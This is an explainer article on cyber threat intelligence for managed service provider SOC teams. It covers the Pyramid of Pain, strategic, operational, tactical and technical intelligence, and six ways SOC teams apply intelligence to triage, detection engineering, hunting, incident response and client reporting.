72% of orgs use or plan to integrate AI into CTI programmes in 2025 (SANS CTI Survey)

84% Threat hunting is the #1 CTI use case in mature SOC teams — up from 71% in 2024 (SANS 2025)

3–6 mo Typical ROI timeline for orgs that operationalise CTI into their SIEM/SOC

Hours How long IP/domain IOCs stay reliable — the decay problem CTI teams fight every day

It’s 2:15am. Your SOC fires on a client — unusual DNS traffic, outbound connections to IPs you’ve never seen, a spike in events that doesn’t match anything in the baseline. The analyst opens the ticket and faces a question that defines the next thirty minutes: real incident, or Tuesday-night noise?

Now picture the same alert where threat intelligence is actually embedded in operations. The SIEM enrichment fires automatically: destination IP confirmed as active C2 infrastructure for a ransomware group targeting mid-market companies in the client’s exact industry, domain registered six days ago, DNS pattern matching known beaconing behaviour. The analyst knows within ninety seconds what they’re dealing with — and what to do next.

That’s the practical difference CTI makes. This article covers what threat intelligence actually is, why the Pyramid of Pain matters, the four intelligence types and who uses each, and — most importantly — what SOC teams do with it every single day.

1. What Threat Intelligence Is — And What It Isn’t

Threat intelligence is processed, contextualised information about adversaries — their capabilities, intentions, infrastructure, and behaviours — that can be acted upon to improve defensive decisions. The key words are ‘processed’ and ‘acted upon.’

Raw data — a list of IPs, a dump of domain names, a file hash — is not intelligence. It becomes intelligence when it’s been analysed, contextualised, and connected to a decision: block this IP, hunt for this behaviour, patch this vulnerability before this group weaponises it.

The Three-Part Intelligence Test Before calling something threat intelligence, ask: (1) Is it timely? Intelligence that arrives after the attack it describes is history. (2) Is it relevant? Generic global threat data is noise for a specific client — intelligence speaks to the specific adversaries and sectors that affect your environment. (3) Is it actionable? If you can’t take a concrete security decision from it, it’s a threat report, not intelligence.

Most feeds fail on relevance or actionability. That’s why a large volume of technically correct threat data can actually increase analyst cognitive load without improving detection outcomes. The most common trap: an IOC ingestion programme masquerading as a CTI programme. Subscribe to feeds, ingest millions of IPs and domains, call it done. A year later you have enormous alert volume, analysts who’ve stopped investigating feed-sourced alerts, and a SIEM spending 40% of its processing budget on blocklist lookups. IOC ingestion has a place — but it’s the lowest-value layer. The high-value work is TTP intelligence, which brings us to the Pyramid.

2. The Pyramid of Pain — Work Higher, Hurt More

Described by security researcher David Bianco in 2013, the Pyramid of Pain organises indicators by the cost they impose on adversaries when defenders act on them. The higher you operate, the more it hurts the attacker — and the more durable your detections become.

Level	Indicator Type	Attacker Cost	Practical Value to Defenders
TTP	Tactics, Techniques & Procedures	Very High	Highest value — detections survive infrastructure rotation and tool changes. ATT&CK-mapped rules live here.
Tools	Malware, RATs, exploit kits	High	YARA/Sigma signatures catch known malware families. Forces attacker to rebuild tooling.
Host / Network Artefacts	Registry keys, mutexes, URI patterns	Moderate	More durable than IP/domain IOCs. Specific artefacts can persist across campaigns.
Domain Names	C2 and phishing domains	Low	Useful for immediate blocking but decays fast. Feeds must be fresh to mean anything.
IP Addresses	IPs used in attacks	Very Low	Short-term blocking only. Yesterday’s IPs may already serve legitimate traffic today.
File Hashes	MD5, SHA-256 of malicious files	Trivial	One recompile = new hash. Works only on exact known samples.

The takeaway is simple: most CTI programmes spend 80% of their investment on the bottom two tiers — hash-based AV signatures and IP blocklists — while the adversaries they’re most worried about are operating on TTPs those controls never touch. Build detections on behaviours, not bytes. A rule that fires on ‘PowerShell spawned from an Office process, executing a base64-encoded command, making an outbound connection within 30 seconds’ catches the new variant, the old variant, and the next one — because the behaviour hasn’t changed, only the bytes.

3. The Four Types — Right Intelligence, Right Audience

A mature CTI programme operates at four levels simultaneously. Getting this wrong is surprisingly common — strategic reports sent to analysts (too abstract to act on), raw IOC feeds forwarded to executives (incomprehensible and alarming).

Type	Audience	Timescale	What It Looks Like
Strategic	CISO, Board	Weeks–months	‘Ransomware groups targeting healthcare increased 40% in Q3. Groups X and Y specifically targeting EHR vendors. Recommended investments: endpoint isolation, backup hardening.’
Operational	SOC Manager, Detection Engineers	Days–weeks	‘A phishing campaign impersonating Microsoft is targeting finance departments in mid-market UK businesses. Emails drop a Cobalt Strike beacon. Indicators and detection guidance attached.’
Tactical	SOC Analysts, Threat Hunters	Hours–days	IOC packages, Sigma rules, YARA signatures — specific IPs, domains, hashes, and ready-to-deploy detection rules for a specific malware family or campaign.
Technical	Security Engineers, Platform Teams	Real-time–hours	Raw STIX/TAXII feeds, TIP data, automated IOC ingestion into SIEM/SOAR — machine-readable indicators consumed directly by security tools without analyst involvement.

For MSP SOC teams, Tactical and Technical intelligence drive the day-to-day. Operational intelligence drives the detection engineering backlog and hunting calendar. Strategic intelligence is what turns your client QBR from a dashboard of alert counts into a meaningful conversation about the threat landscape affecting their industry. The intelligence gives the story — without it, the metrics are just numbers.

4. How SOC Teams Actually Use It — Six Workflows

Here’s what CTI integration looks like as day-to-day SOC work across the six functions where intelligence drives the most value:

• Alert Triage — IOC enrichment fires at alert time: IP reputation, domain age, hash verdict, all surfaced automatically. What took 10–15 minutes of manual lookups across four tools now takes 90 seconds.
• Detection Engineering — A new campaign report arrives; within hours, a detection engineer has written a Sigma rule from the TTP description and pushed it to the SIEM. Without CTI, the technique runs undetected for weeks.
• Threat Hunting — Named actor TTPs drive concrete hypotheses. A NOBELIUM report sends a hunter into AD logs looking for service account authentications to new hosts, cross-referenced with unusual SMB traffic. They find a dormant compromised account that automated alerts missed.
• Incident Response — Ransomware detonates. Hash matches Akira. The CTI team immediately pulls the Akira playbook: known to use AnyDesk for persistence, exfiltrate via MEGAsync, target VMware ESXi. The IR team checks those specific artefacts first instead of starting from scratch.
• Vulnerability Prioritisation — A CVSS 9.8 vulnerability drops. CTI confirms no active exploitation in the wild, not in CISA KEV, not used by any tracked actor targeting this sector. Moves to standard patch window instead of emergency mobilisation.
• Client Reporting — Monthly QBR: ‘Three ransomware groups targeting your industry increased activity last quarter. Our detections blocked 12 C2 connections. Here’s what we changed in our detection coverage and why.’ That’s a strategic partner conversation, not an SLA report.

The rule that ties all six workflows together: every threat report that reaches your SOC team should produce at least one tangible output — a new detection rule, an updated playbook section, a retrospective hunt, or a client advisory. One report, one action. The teams that maintain this discipline consistently outperform the ones who treat threat reports as reading material.

5. Building CTI Without a Dedicated Analyst

Most MSPs don’t have a dedicated threat intelligence analyst — and that’s fine. CTI functions get distributed across the SOC team alongside alert triage, detection engineering, and IR. Here’s how to build real capability within those constraints.

Start with one high-quality commercial feed and one OSINT source — CISA KEV plus vendor advisories is a strong baseline. Get the ingestion pipeline right, establish IOC age-out policies (IPs: 7–14 days; domains: 7–30 days; TTPs: never expire), and validate alert quality before adding more feeds. The MSPs that fail at CTI adoption subscribe to 15 feeds and process none of them effectively.

Use ATT&CK as the connective tissue. Map every significant threat report to ATT&CK techniques. Map your existing SIEM rules to ATT&CK techniques. The gap between those two maps is your detection backlog — a direct, concrete comparison between what attackers do and what you can currently detect. That’s how you prioritise detection engineering work without abstract risk scores.

And don’t overlook your own incident data. When your SOC responds to a credential-stuffing campaign hitting one financial sector client, those source IPs, targeted usernames, timing patterns, and techniques are immediately relevant to every other financial sector client in your portfolio. The same campaign that hit one client this week will hit another next week. Formalise that feedback loop.

Final Thoughts

Threat intelligence done well is one of the highest-leverage investments a SOC can make — because it converts reactive alert investigation into proactive, threat-informed defence. Faster detection, more accurate triage, purposeful hunting, more efficient incident response.

The measure of a good CTI programme isn’t the size of the feed library. It’s the quality of the detections it produced and the incidents it prevented. And for MSPs, it’s also a client communication asset — the difference between a security service that feels like insurance and one that feels like a genuine strategic partner.